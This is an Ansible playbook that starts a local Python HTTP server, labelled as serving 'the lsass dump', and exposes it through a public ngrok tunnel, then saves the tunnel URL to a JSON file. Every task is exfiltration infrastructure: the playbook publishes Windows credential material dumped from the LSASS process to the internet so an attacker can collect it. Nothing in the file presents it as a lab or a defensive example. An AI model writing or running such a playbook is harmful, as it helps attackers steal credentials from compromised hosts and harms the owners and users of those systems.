---
- name: Configure ngrok authtoken
  shell: |
    ngrok authtoken {{ ngrok_authtoken }}

- name: Create HTTP server to serve the lsass dump
  shell: |
    python3 server/app.py --port {{ ngrok_port }} &

- name: Wait for server to start
  pause:
    seconds: 5

- name: Start ngrok http tunnel
  shell: |
    nohup ngrok http {{ ngrok_port }} &

- name: Wait for ngrok to start
  pause:
    seconds: 5

- name: Get ngrok public URL
  shell: |
    curl --silent --show-error http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url
  register: ngrok_url


- name: Store ngrok URL in JSON file
  copy:
    content: |
      {
        "ngrok_url": "{{ ngrok_url.stdout }}"
      }
    dest: ngrok_url.json

- name: Display the output
  debug:
    msg: "{{ ngrok_url.stdout }}"
